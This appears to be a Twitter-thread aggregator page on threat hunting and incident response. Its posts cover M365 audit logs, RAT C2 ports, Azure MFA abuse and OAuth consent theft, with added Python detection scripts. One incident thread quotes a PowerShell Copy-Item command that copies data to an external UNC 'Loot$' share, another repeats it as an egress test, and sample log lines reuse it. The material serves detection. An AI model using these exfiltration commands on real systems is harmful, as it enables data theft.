Discover and read the best of Twitter Threads about #threathunting


OK, so there is definitely a problem with the Search-UnifiedAuditLog cmdlet in #Microsoft365. Confirmed this in multiple tenants - here's what I'm seeing: 🧵

#threathunting #threathunt #auditlogs #M365 #Office365 #O365 #M365Security
First, go to -> Audit and perform a new search for all events in a given timeframe (a few hours, total). Have this available for reference.
Next, open PowerShell and connect to Exchange Online:


You ran a search in the Defender portal with a date range of a few hours. Within that same timeframe, pick an even smaller date/time range that has < 100 events. You'll need those timestamps next.
1/ I am taking a little break but couldn't resist checking out my favourite open-source projects for any updates. Doing so, I thought it would be useful to share my top 10 projects that anyone in the #infosec field should know about. Here they are 🧵:
2/ 📊 HELK: The Hunting ELK (HELK) project provides an analytics and threat hunting platform for security teams to identify and respond to threats in their environment. Just load your logs and start hunting! #HELK #ThreatHunting
3/ 🔍 Sigma: Sigma enables infosec peeps to create rules for SIEM systems for detecting and responding to security incidents. It also allows us to share our rules in a non-vendor-specific format! Free detections anyone!?! #Sigma #SIEM
Today's quick #malware analysis with #SecurityOnion: FAKEBAT, REDLINE STEALER, and GOZI/ISFB/URSNIF pcap from 2023-02-03!

Thanks to @malware_traffic for sharing this pcap!

More screenshots:…

Let's review some of the data that #SecurityOnion generates from this traffic!

When you import the pcap using so-import-pcap, it will generate a hyperlink that will take you to the Overview dashboard:
Here are the NIDS alerts:
How are you showing value from your #ThreatHunting programs? I think a lot of teams really struggle with this, so interested in hearing others’ thoughts. Putting my $0.02 in the thread. 1/3
I think a lot of hunt teams look at findings as the holy grail, but I would argue that there are better ways to show value. One of the best I’ve found is to compare those hunt findings against true positive findings from other tools (other investments). 2/3
For example, how many hunt findings did you produce compared to the total findings worked by the SOC? If you really want to stand out, give your leaders data they’ve never seen before. If your metrics are only relevant to you, you probably aren’t playing your best hand. 3/3
With the release of my open-source #CobaltStrike stager decoder (which you can read about here: …) I thought I'd make a thread showcasing some of the other great open-source tooling out there to help with Cobalt Strike #ThreatHunting and #ThreatIntel 🧵
…: These are the OG scripts designed for interfacing with Team Servers. Famous for its get_beacon script for milking staged payloads from Team Servers and decrypting them, this GH account also has a script for logging into teamservers and wordlists 💀
…: The first Cobalt Strike Beacon configuration extractor that I was aware of. @jpcert_en created a volatility plugin for finding and parsing Beacon configs from memory.
1/ #Azure In a recent case, the TA was able to compromise the user despite MFA (MFA fatigue).

After logging in, the attacker registered another mobile number as "Alternate Mobile Phone Call".

In the audit logs, we see this event within "Authentication Methods":

2/ The audit logs are a goldmine for finding suspicious behavior in an Azure tenant.

If we filter by "Core Directory", "UserManagement" and "Update user" ..
3/ .. we also see the ModifiedProperties (the modifications done by the attacker).

Notice, the primary Phone Number is a Swiss mobile phone (+41), and the attacker added a number from the United Arab Emirates (+971).

Suspicious? You bet!
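The manual check in the thread above (new phone number with a different country code than the existing one) can be turned into a repeatable hunt. The following is an added example, not code from the thread's author: it walks an Azure AD "Update user" audit record, pulls the phone numbers out of the StrongAuthenticationUserDetails modified property and flags a newly added number whose international dial code is not already present on the account. The record layout (targetResources -> modifiedProperties with JSON-string old/new values), the field names inside that JSON and the dial-code table are assumptions; the event is constructed sample data.

```python
"""Added example: flag newly registered MFA phone numbers whose dial code does
not match the numbers already on the account.

Assumptions (not from the original thread): the audit record follows the
Microsoft Graph / Sentinel AuditLogs layout with targetResources ->
modifiedProperties, and the StrongAuthenticationUserDetails property carries
old/new values as JSON strings holding a one-element list of phone fields.
"""
import json
import re

PHONE_FIELDS = ("PhoneNumber", "AlternativePhoneNumber", "VoiceOnlyPhoneNumber")

# Constructed subset of international dial codes, used for longest-prefix
# matching. Extend it for the countries your users actually live in.
KNOWN_DIAL_CODES = ("1", "41", "44", "49", "971")


def dial_code(number):
    """Return the international dial code of a '+'-prefixed number, else None."""
    if not number:
        return None
    compact = re.sub(r"[^\d+]", "", number)  # drop spaces, dashes, parentheses
    if not compact.startswith("+"):
        return None  # nationally formatted number: no reliable country signal
    digits = compact[1:]
    for code in sorted(KNOWN_DIAL_CODES, key=len, reverse=True):
        if digits.startswith(code):
            return code
    return digits[:2]  # heuristic fallback for codes outside the table


def _phone_details(value):
    """old/newValue are JSON strings wrapping a one-element list (assumed shape)."""
    if not value:
        return {}
    parsed = json.loads(value)
    if isinstance(parsed, list):
        parsed = parsed[0] if parsed else {}
    return parsed or {}


def hunt_phone_changes(event):
    """Return one finding per phone field that gained a new value.

    A finding is suspicious when the account already had numbers and the new
    number's dial code is not among them (e.g. +41 baseline, +971 added)."""
    findings = []
    targets = event.get("targetResources") or [{}]
    user = targets[0].get("userPrincipalName")
    for target in targets:
        for prop in target.get("modifiedProperties", []):
            if prop.get("displayName") != "StrongAuthenticationUserDetails":
                continue
            old = _phone_details(prop.get("oldValue"))
            new = _phone_details(prop.get("newValue"))
            baseline = {dial_code(old.get(f)) for f in PHONE_FIELDS} - {None}
            for field in PHONE_FIELDS:
                if new.get(field) and new.get(field) != old.get(field):
                    code = dial_code(new[field])
                    findings.append({
                        "user": user,
                        "field": field,
                        "old": old.get(field),
                        "new": new[field],
                        "dial_code": code,
                        "baseline_dial_codes": sorted(baseline),
                        "suspicious": bool(baseline) and code not in baseline,
                    })
    return findings


def build_update_user_event(old_phones, new_phones, upn="alice@contoso.example"):
    """Construct a sample 'Update user' record in the assumed layout."""
    blank = {f: None for f in PHONE_FIELDS}
    blank["Email"] = None
    return {
        "activityDisplayName": "Update user",
        "category": "UserManagement",
        "loggedByService": "Core Directory",
        "initiatedBy": {"user": {"userPrincipalName": upn}},
        "targetResources": [{
            "userPrincipalName": upn,
            "modifiedProperties": [{
                "displayName": "StrongAuthenticationUserDetails",
                "oldValue": json.dumps([{**blank, **old_phones}]),
                "newValue": json.dumps([{**blank, **new_phones}]),
            }],
        }],
    }


# Constructed sample mirroring the case in the thread: Swiss primary number,
# UAE number added as the alternate phone.
SAMPLE_EVENT = build_update_user_event(
    {"PhoneNumber": "+41 79 123 45 67"},
    {"PhoneNumber": "+41 79 123 45 67", "AlternativePhoneNumber": "+971 50 123 4567"},
)

if __name__ == "__main__":
    for finding in hunt_phone_changes(SAMPLE_EVENT):
        print(finding)
```

Run it over the exported "Update user" events of your tenant and triage the findings where suspicious is true; a same-country addition is reported too, but not flagged, so the baseline comparison rather than the mere presence of a change is what carries the signal.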
Over the last few months, I have collected some awesome new #KQL sources, and this 🧵 lists them.
Are you using Defender for Endpoint, Sentinel or Intune, or do you want to learn KQL? Then have a look!
#MDE #Sentinel #Intune #Detection #ThreatHunting
Type: Query
By: @msftsecurity
Community-based repository for a lot of available data sources in Sentinel. For the E5 detections take a look in the Microsoft 365 Defender Folder.
Type: Query
By: @reprise_99
Repository with 100s of KQL queries you can directly use. They are categorized into different Microsoft product categories. You are guaranteed to find useful queries here.
At #IWCON2022, we have 15+ amazing #cybersecurity speakers from around the world 🌍

To share unique methods and findings with y’all 😍🙌

Get ready with your questions. Our experts will answer you live 🔥

Book your ticket:

Meet our speakers 🧵👇
#1 Gabrielle Hempel @gabsmashh, #security engineer @Netwitness 🥳

Her topic: #Threat hunting in #cloud environments 🌩️

Time: 17th Dec, 7:30 pm IST

Want to attend this talk? 😍

Book your ticket here:

#cloudhunting #threathunting
#2 Luke Stephens @hakluke, founder of @haksecio 🔥

His topic: How I used #recon techniques to identify a prolific #scammer 👊

Time: 17th Dec, 6:30 pm IST ❤️

Don't wanna miss it?

Register today:

#infosec #hacking #hackingthehacker
🦖Day 36 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: MacOS.System.QuarantineEvents

Link: …
This artifact parses the 'com.apple.LaunchServices.QuarantineEventsV2' sqlite database to provide defenders with information around files that have been downloaded from the internet.

Information includes:

- DL Time
- Origin
- Agent Name/Bundle
- User
- Event UUID
On macOS, when a user downloads a file from the internet/third party source, the file will have an extended attribute associated with it called 'com.apple.quarantine'.

This asserts that the file will not be opened/executed until explicitly allowed by the user (via prompt).
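For readers who want the same fields without Velociraptor, here is an added example in Python (not the artifact's own code) that reads the QuarantineEventsV2 database and emits the download time, origin, agent name/bundle, user and event UUID listed above, converting the Cocoa-epoch timestamp correctly and flagging downloads fetched straight from a bare IP address. The database it parses is constructed sample data built with the real LSQuarantineEvent column set; the per-user location under ~/Library/Preferences is the assumption behind the user field.

```python
"""Added example: parse a macOS QuarantineEventsV2 database into hunt-ready rows.

Not the Velociraptor artifact's code; the database built below is constructed
sample data using the LSQuarantineEvent table layout.
"""
import ipaddress
import os
import sqlite3
import tempfile
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

# LSQuarantineTimeStamp counts seconds from the Cocoa epoch (2001-01-01 UTC);
# reading it as Unix time would put every download 31 years in the past.
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def cocoa_to_utc(seconds):
    return COCOA_EPOCH + timedelta(seconds=float(seconds))


def _is_bare_ip(host):
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def parse_quarantine_events(db_path, user=None):
    """Return download records, newest first.

    The DB normally lives at ~/Library/Preferences/com.apple.LaunchServices
    .QuarantineEventsV2 (assumption), so pass the owning user explicitly when
    parsing a copied file."""
    conn = sqlite3.connect(db_path)
    try:
        rows = conn.execute(
            "SELECT LSQuarantineEventIdentifier, LSQuarantineTimeStamp, "
            "LSQuarantineAgentName, LSQuarantineAgentBundleIdentifier, "
            "LSQuarantineDataURLString, LSQuarantineOriginURLString "
            "FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC"
        ).fetchall()
    finally:
        conn.close()
    events = []
    for uuid, ts, agent, bundle, data_url, origin_url in rows:
        host = urlsplit(data_url or "").hostname
        events.append({
            "event_uuid": uuid,
            "download_time": cocoa_to_utc(ts).isoformat() if ts is not None else None,
            "agent_name": agent,
            "agent_bundle": bundle,
            "data_url": data_url,
            "origin_url": origin_url,
            "user": user,
            # Downloads straight from a bare IP are a cheap hunting pivot.
            "direct_ip_download": _is_bare_ip(host),
        })
    return events


def build_sample_db(path):
    """Create a constructed database with the LSQuarantineEvent column set."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE LSQuarantineEvent ("
        "LSQuarantineEventIdentifier TEXT PRIMARY KEY NOT NULL, "
        "LSQuarantineTimeStamp REAL, LSQuarantineAgentBundleIdentifier TEXT, "
        "LSQuarantineAgentName TEXT, LSQuarantineDataURLString TEXT, "
        "LSQuarantineSenderName TEXT, LSQuarantineSenderAddress TEXT, "
        "LSQuarantineTypeNumber INTEGER, LSQuarantineOriginTitle TEXT, "
        "LSQuarantineOriginURLString TEXT, LSQuarantineOriginAlias BLOB)"
    )
    conn.executemany(
        "INSERT INTO LSQuarantineEvent (LSQuarantineEventIdentifier, "
        "LSQuarantineTimeStamp, LSQuarantineAgentBundleIdentifier, "
        "LSQuarantineAgentName, LSQuarantineDataURLString, "
        "LSQuarantineOriginURLString) VALUES (?, ?, ?, ?, ?, ?)",
        [
            ("0C0E5B1E-0000-4000-8000-000000000001", 697000000.0, "com.apple.Safari",
             "Safari", "https://downloads.example.org/installer.dmg", "https://example.org/get"),
            ("0C0E5B1E-0000-4000-8000-000000000002", 697003600.0, "com.apple.mail",
             "Mail", "http://203.0.113.5/invoice.pkg", None),
        ],
    )
    conn.commit()
    conn.close()


def parse_sample():
    """Build the constructed DB in a temp dir, parse it and clean up."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "com.apple.LaunchServices.QuarantineEventsV2")
        build_sample_db(path)
        return parse_quarantine_events(path, user="alice")


if __name__ == "__main__":
    for event in parse_sample():
        print(event)
```

Point parse_quarantine_events at a database copied from a live host (keep the user name from the source path) and sort or filter on agent_name and direct_ip_download; a Mail or Terminal agent fetching a package from a bare IP is the kind of row worth opening first.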
Hey there, today we have something special for you.

Here's a list of SPY/INTELLIGENCE agencies across the world. 🕵️‍♀️🕵🌍🔎

#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT

1. RAW (Research & Analysis Wing), India
Formed: 21 September 1968
2. CIA (Central Intelligence Agency), USA
Formed: September 18, 1947
3. Mossad, Israel
Formed: 13 December 1949 (as the Central Institute for Coordination)
1/ In a recent compromise, we saw the same multi-layered infection chain that eventually led to AsyncRAT, as described by the ASEC team. [1]

AsyncRAT could not connect to the C2 because the destination port on the firewall was blocked. 🧵

2/ As can be seen in the screenshot above, port 6666 was used, which can be chosen arbitrarily within the builder from AsyncRAT.

3/ Of course, connections within the firewall logs that connect to an IP address on a high port are interesting for #ThreatHunting.

And, even more, connections to a blocked high port.
Hey #OSINT, you might have heard about @spiderfoot, let's try to learn what it does best. #ThreatHunting #threatintelligence #recon #infosec

A thread👇
SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more.
You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.
1/ #ThreatHunting: @Avast has blogged how Roshtyak checks the VBAWarnings registry value.

If the value is 1 ("Enable all macros"), then the code will not be executed because it is assumed that this setting is only enabled in a sandbox (or by courageous users). 🧵 #CyberSecurity
2/ "Interestingly, this means that users, who for whatever reason have lowered their security this way, are immune to Roshtyak." [1]
3/ However, this "Enable all macros" value can also be explicitly set for Outlook

(Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook - Level = 1).

If this value is set to 1 in a user context, a nifty persistence within Outlook may have been set up by a TA.
1/ #ThreatHunting: Normal users (not developers) who have Python in their Music (!) directory? This screams TA 😅

In an investigation on a breached network, we discovered the following directory:

2/ The funny thing is that the TA appended "Music" to the ordinary directory name "python-3.9.10.amd64" to make it look more legitimate?

In several directories, we found attack scripts (written in Python), including

3/ And the whole impacket suite.


Monitoring or creating a baseline (which users are using Python) could be helpful here, or just monitoring from which paths Python is started (like in our example from the Music directory).
1/ #ThreatHunting:

In a compromised network, the TA used PCHunter on different systems to disable the local AV (or at least tried it).

In the web requests recorded on the firewall, we found traces of the download:

🧵 #CyberSecurity
2/ @CrowdStrike also mentioned PCHunter in the latest ThreatHunting report, along with GMER.…
3/ I have tweeted about two of these tools (PCHunter / GMER) before, and we also see these two products regularly in our IR cases.

1/ #ThreatHunting:

In a compromised network, we saw the following request in the proxy logs:


This scanner is trendy among ransomware groups and has been mentioned in reports by @TheDFIRReport, among others. [1] 🧵
2/ This HTTP request can now be used very well for an alert.

Or better, collect and monitor all your DNS logs, because a DNS request will still go out if the Advanced IP Scanner is run without an installation (portable version).

An excellent opportunity for detection.
3/ You can see the DNS request for the domain www.advanced-ip-scanner[.]com below.
1/ #ThreatHunting

Another one for the people who monitor PowerShell logs or command lines:

Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse

This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
2/ Of course, outgoing SMB traffic must be allowed on the firewall(s).

#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:

Copy-Item -Path "C:\Temp\" -Destination "\\142.93.X.X\c$"
3/ On our specified endpoint on the Internet (with the
-Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):

# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
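For the people monitoring PowerShell logs, here is an added example (not from the thread's author) of the hunt this thread suggests: it scans script-block text or process command lines for Copy-Item (and its aliases) with a -Destination pointing at a UNC path, resolves whether the target host is inside the organisation, and reports the copies going out. The internal address ranges and DNS suffix are assumptions to tune per environment, and the log lines are constructed samples.

```python
"""Added example: hunt PowerShell logs for Copy-Item pushing data to a UNC path
on a host outside the organisation.

Not from the thread's author. Internal ranges and DNS suffix are assumptions;
the log lines are constructed samples of script-block logging (event 4104) or
process command-line output.
"""
import ipaddress
import re

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_DNS_SUFFIXES = (".corp.example",)  # assumption: your internal zones

# Copy-Item and its aliases, with -Destination (PowerShell accepts any
# unambiguous prefix, hence -Dest\w*) pointing at a \\host\share path.
# Positional destinations (Copy-Item src \\host\share) are not covered here.
COPY_TO_UNC = re.compile(
    r"\b(?:Copy-Item|cpi|cp|copy)\b.*?-Dest\w*\s+[\"']?(\\\\[\w.\-]+\\[^\s\"']*)",
    re.IGNORECASE,
)


def is_internal_host(host):
    try:
        ip = ipaddress.ip_address(host)
        return any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        return host.lower().endswith(INTERNAL_DNS_SUFFIXES)


def classify(line):
    """Return a record for a Copy-Item-to-UNC line, or None if unrelated."""
    m = COPY_TO_UNC.search(line)
    if not m:
        return None
    unc = m.group(1)
    host, _, rest = unc[2:].partition("\\")
    share = rest.split("\\", 1)[0]
    return {
        "host": host,
        "share": share,
        "external": not is_internal_host(host),
        "hidden_share": share.endswith("$"),  # admin/hidden shares like c$ or Loot$
        "line": line,
    }


def hunt_exfil_copies(lines):
    """Keep only the copies whose destination host is outside the organisation."""
    hits = (classify(line) for line in lines)
    return [h for h in hits if h and h["external"]]


# Constructed sample log lines (script-block text / command lines).
SAMPLE_LINES = [
    r'Copy-Item -Path "C:\Exfiltration" -Destination "\\203.0.113.10\Loot$" -Recurse',
    r'Copy-Item -Path "C:\Temp\report.docx" -Destination "\\fileserver01.corp.example\users$\alice"',
    r"Copy-Item -Path C:\Temp -Destination \\10.0.0.5\backup -Recurse",
    r"cp .\docs -Dest '\\198.51.100.7\c$' -Recurse",
    r"Get-Process | Where-Object { $_.CPU -gt 100 }",
]

if __name__ == "__main__":
    for hit in hunt_exfil_copies(SAMPLE_LINES):
        print(hit["host"], hit["share"], "hidden" if hit["hidden_share"] else "")
```

Copies to internal hosts are still returned by classify, so the same parser serves a lateral-movement hunt (internal destination, hidden share) by changing the filter in hunt_exfil_copies; the exfiltration case is the external destination, which on the thread's network would also show up as an outbound SMB connection on the firewall.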
A list of top 10 popular malware reports that every Malware Analyst should check out

Take a look at these excellent Malware analysis reports

#malware #ThreatHunting #threatintelligence #fireeye #virus #Talos @TalosSecurity #linux #hacking #networks #rootkits

1⃣ CheckPoint - SpeakUp: A New Undetected Backdoor Linux Trojan

2⃣ First Sednit UEFI Rootkit unveiled

1\ #ThreatHunting: Detecting OAuth Token Theft in Azure / M365

This technique is STILL being abused by Chinese APT groups. This blog covers several methods of detecting this technique😈.

It's also a good reminder to always perform browser forensics ;)…
2\ METHOD 1: Look for the OAuth redirect consent link in browser history and/or proxy logs.

Take note of the following fields:
- client_id (malicious app id)
- redirect_uri (malicious domain)
- scope (API permissions requested)
3\ Review permissions requested in the scope field (I'll show you where else to find these permissions in the logs).

Take note of these:
- User.Read
- User.ReadWrite
- User.ReadWrite.All
- Mail.ReadWrite
- Calendars.ReadWrite
- Files.ReadWrite
- User.Export.All
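METHOD 1 above is easy to automate across a proxy export or a browser-history dump. The following is an added example (not the blog's code) that pulls authorize URLs out of log lines, decodes client_id, redirect_uri and scope, normalises resource-qualified scopes such as https://graph.microsoft.com/Mail.ReadWrite, and flags requests whose redirect host is not one you own and whose scopes go beyond User.Read. The authorize host is the commercial Entra ID endpoint, the domains treated as "ours" are an assumption, and the log lines are constructed samples.

```python
"""Added example: extract OAuth consent requests from proxy logs or browser
history and report client_id, redirect_uri and scope.

Not the blog's code. OWN_REDIRECT_DOMAINS is an assumption; add sovereign-cloud
authorize hosts to AUTHORIZE_HOSTS if you have them. Log lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

AUTHORIZE_HOSTS = {"login.microsoftonline.com"}
AUTHORIZE_PATH_SUFFIXES = ("/oauth2/v2.0/authorize", "/oauth2/authorize")

# Permissions the thread tells you to watch for.
NOTEWORTHY_SCOPES = {
    "User.Read", "User.ReadWrite", "User.ReadWrite.All", "Mail.ReadWrite",
    "Calendars.ReadWrite", "Files.ReadWrite", "User.Export.All",
}
# User.Read alone is requested by almost every legitimate app, so on its own
# it is not enough to call a request suspicious.
LOW_SIGNAL = {"User.Read"}

OWN_REDIRECT_DOMAINS = ("contoso.example",)  # assumption: domains you control

URL_RE = re.compile(r"https?://\S+")


def normalise_scope(scope):
    """'https://graph.microsoft.com/Mail.ReadWrite' -> 'Mail.ReadWrite'."""
    return scope.rsplit("/", 1)[-1]


def _is_own_domain(host):
    return any(host == d or host.endswith("." + d) for d in OWN_REDIRECT_DOMAINS)


def parse_consent_url(url):
    """Return the consent-relevant fields of an authorize URL, or None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host not in AUTHORIZE_HOSTS or not parts.path.endswith(AUTHORIZE_PATH_SUFFIXES):
        return None
    q = parse_qs(parts.query)  # decodes %xx escapes and '+' separators
    scopes = [normalise_scope(s) for s in " ".join(q.get("scope", [])).split()]
    redirect_uri = q.get("redirect_uri", [None])[0]
    redirect_host = (urlsplit(redirect_uri).hostname or "").lower() if redirect_uri else ""
    external = bool(redirect_host) and not _is_own_domain(redirect_host)
    noteworthy = sorted(set(scopes) & NOTEWORTHY_SCOPES)
    return {
        "tenant": parts.path.split("/")[1] if parts.path.count("/") >= 2 else None,
        "client_id": q.get("client_id", [None])[0],
        "redirect_uri": redirect_uri,
        "redirect_host": redirect_host,
        "external_redirect": external,
        "scopes": scopes,
        "noteworthy_scopes": noteworthy,
        "suspicious": external and bool(set(noteworthy) - LOW_SIGNAL),
    }


def hunt_consent_requests(log_lines):
    """Pull every URL out of each line and keep the authorize requests."""
    findings = []
    for line in log_lines:
        for url in URL_RE.findall(line):
            rec = parse_consent_url(url)
            if rec:
                rec["line"] = line
                findings.append(rec)
    return findings


# Constructed proxy-log lines (timestamp, client, method, URL, status).
SAMPLE_LOG = [
    "2023-02-03T10:11:12Z 10.1.2.34 GET https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=00000000-aaaa-bbbb-cccc-000000000001&response_type=code"
    "&redirect_uri=https%3A%2F%2Fconsent.example.net%2Fcb"
    "&scope=openid+offline_access+Mail.ReadWrite+Files.ReadWrite+User.Read 200",
    "2023-02-03T10:12:40Z 10.1.2.34 GET https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=00000000-aaaa-bbbb-cccc-000000000002&response_type=code"
    "&redirect_uri=https%3A%2F%2Fapp.contoso.example%2Fauth&scope=openid+profile+User.Read 200",
    "2023-02-03T10:13:05Z 10.1.2.34 GET https://login.microsoftonline.com/common/oauth2/authorize"
    "?client_id=00000000-aaaa-bbbb-cccc-000000000003&response_type=code"
    "&redirect_uri=https%3A%2F%2Fevil-consent.example.net%2Fcb"
    "&scope=https%3A%2F%2Fgraph.microsoft.com%2FUser.ReadWrite.All 200",
    "2023-02-03T10:14:00Z 10.1.2.34 GET https://www.example.org/ 200",
]

if __name__ == "__main__":
    for rec in hunt_consent_requests(SAMPLE_LOG):
        print(rec["client_id"], rec["redirect_host"], rec["noteworthy_scopes"], rec["suspicious"])
```

The client_id values that come out are what you then look up in the tenant's enterprise applications and consent audit events; a redirect_uri on a domain you do not own combined with mailbox or file scopes is the combination the thread is warning about.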
1/ #ThreatHunting:

#QuasarRAT is another RAT we see from time to time in our IR cases and was also used against NATO facilities in March. [1]

We can hunt for

1⃣ The default port within the FW logs
4⃣ Persistence mechanisms

2/ @qualys has published an excellent paper ("Stealthy Quasar Evolving to Lead the RAT Race") about Quasar, where the whole builder and much more are described in detail. [2]
3/ In the client builder (which creates an executable which is used for the infection), the default port is pre-configured to 4782.
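Both this thread (QuasarRAT's default port 4782) and the AsyncRAT thread earlier on this page (repeated connections to a blocked high port 6666) rely on the same firewall-log hunt. The following is an added example, not from either thread's author, that aggregates outbound flows per source, destination and port, keeps only internal-to-public connections on ports above 1024, and ranks them by how many reasons they collect: blocked by policy, and landing on a known RAT default port. The key=value log format, the internal ranges, the benign high-port allowlist and the AsyncRAT default ports (6606, 7707, 8808) are assumptions; 4782 is from the thread, and the log is constructed.

```python
"""Added example: rank outbound firewall connections to public IPs on high
ports, the pattern behind the AsyncRAT and QuasarRAT cases on this page.

Not from the thread authors. The log format is a constructed key=value syslog
style; internal ranges, the benign high-port allowlist and the AsyncRAT
default ports are assumptions, QuasarRAT's 4782 is from the thread.
"""
import ipaddress
import re
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

KNOWN_RAT_PORTS = {
    4782: "QuasarRAT client-builder default (from the thread)",
    6606: "AsyncRAT builder default (assumed)",
    7707: "AsyncRAT builder default (assumed)",
    8808: "AsyncRAT builder default (assumed)",
}
BENIGN_HIGH_PORTS = {8080, 8443}  # assumption: tune to what your proxies use
DENY_ACTIONS = {"deny", "drop", "block", "reject"}

KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Parse 'action=... src=... dst=... dport=...'; None if fields are missing."""
    f = dict(KV.findall(line))
    try:
        return {
            "src": ipaddress.ip_address(f["src"]),
            "dst": ipaddress.ip_address(f["dst"]),
            "dport": int(f["dport"]),
            "denied": f.get("action", "").lower() in DENY_ACTIONS,
        }
    except (KeyError, ValueError):
        return None


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def hunt_high_port_c2(lines, min_hits=1):
    """Aggregate per (src, dst, dport) and score the unusual flows.

    Only internal -> external flows on ports above 1024 are considered; the
    more reasons a flow collects (blocked, known RAT port), the higher it sorts."""
    tally = defaultdict(lambda: {"hits": 0, "denied": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_internal(rec["src"]) or is_internal(rec["dst"]):
            continue
        if rec["dport"] <= 1024 or rec["dport"] in BENIGN_HIGH_PORTS:
            continue
        key = (str(rec["src"]), str(rec["dst"]), rec["dport"])
        tally[key]["hits"] += 1
        tally[key]["denied"] += int(rec["denied"])
    findings = []
    for (src, dst, dport), t in tally.items():
        if t["hits"] < min_hits:
            continue
        reasons = ["outbound to public IP on high port"]
        if t["denied"]:
            reasons.append("blocked %d of %d attempts" % (t["denied"], t["hits"]))
        if dport in KNOWN_RAT_PORTS:
            reasons.append(KNOWN_RAT_PORTS[dport])
        findings.append({"src": src, "dst": dst, "dport": dport,
                         "hits": t["hits"], "denied": t["denied"], "reasons": reasons})
    findings.sort(key=lambda x: (-len(x["reasons"]), -x["hits"]))
    return findings


# Constructed sample log: an infected host retrying its blocked C2 port,
# another host reaching a Quasar default port, plus ordinary traffic.
SAMPLE_LOG = [
    "2023-02-03T10:00:%02dZ fw01 action=deny src=10.1.2.34 dst=198.51.100.23 proto=tcp dport=6666" % s
    for s in range(0, 50, 10)
] + [
    "2023-02-03T10:01:00Z fw01 action=allow src=10.1.2.34 dst=198.51.100.40 proto=tcp dport=443",
    "2023-02-03T10:01:05Z fw01 action=allow src=10.1.2.50 dst=203.0.113.9 proto=tcp dport=4782",
    "2023-02-03T10:01:10Z fw01 action=deny src=10.1.2.34 dst=10.1.2.1 proto=tcp dport=8808",
    "2023-02-03T10:01:15Z fw01 action=allow src=10.1.2.60 dst=203.0.113.77 proto=tcp dport=8443",
    "2023-02-03T10:01:20Z fw01 this line is not key=value formatted",
]

if __name__ == "__main__":
    for f in hunt_high_port_c2(SAMPLE_LOG):
        print(f["src"], "->", f["dst"], f["dport"], f["hits"], "; ".join(f["reasons"]))
```

Because the port is operator-chosen (the AsyncRAT thread saw 6666, not a builder default), the generic high-port rule is the one that carries the hunt; the RAT port table only raises a flow in the ranking. Raising min_hits suppresses one-off connections and surfaces the retry pattern of a client that cannot reach its C2.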
1/ #ThreatHunting

MeshCentral is another remote admin software installed by TAs we have seen in our IR cases [1].

Following is a brief introduction to the software and what forensic traces MeshCentral leaves on the network and the hosts. 🧵

2/ For our tests, we use the hosted instance of, but the management software can also be run on a separate server, controlled by the TA.

After logging into the panel, we can download an agent for different operating systems (Windows, Mac, Linux).
3/ Before the installation or execution of the agent, the server URL is displayed under "Connection Details".

In our example, the agent connects to, but another domain can be configured when the management server is self-hosted.
1/ #ThreatHunting for #AsyncRAT

We have various ways to find infected hosts with AsyncRAT:

1⃣ Usage of standard C2 ports
2⃣ Hunting for persistence
3⃣ Mutexes FTW
4⃣ Last but not least, hunting for dropped DLLs

Let's go 🤠🧵

2/ AsyncRAT is a popular Trojan executed at the end of an infection chain on target computers.

@hpsecurity ([2],[3]) and @Trellix ([4]) have both reported in recent reports that TAs have been deploying AsyncRAT.
3/ Since the source code of AsyncRAT is publicly available [1], we can obtain a copy to investigate and build detection capabilities for this RAT.
🔔I published a new script to parse the log of #AppLocker🔒 , which I called Get-AppLockerEventlog.ps1

It compiles all the useful data needed in #threathunting and #DFIR

You can find the script and the documentation here:
2/ Also, you can save the output as a CSV.
3/ It comes with 4 cases (block, all, allow, audit).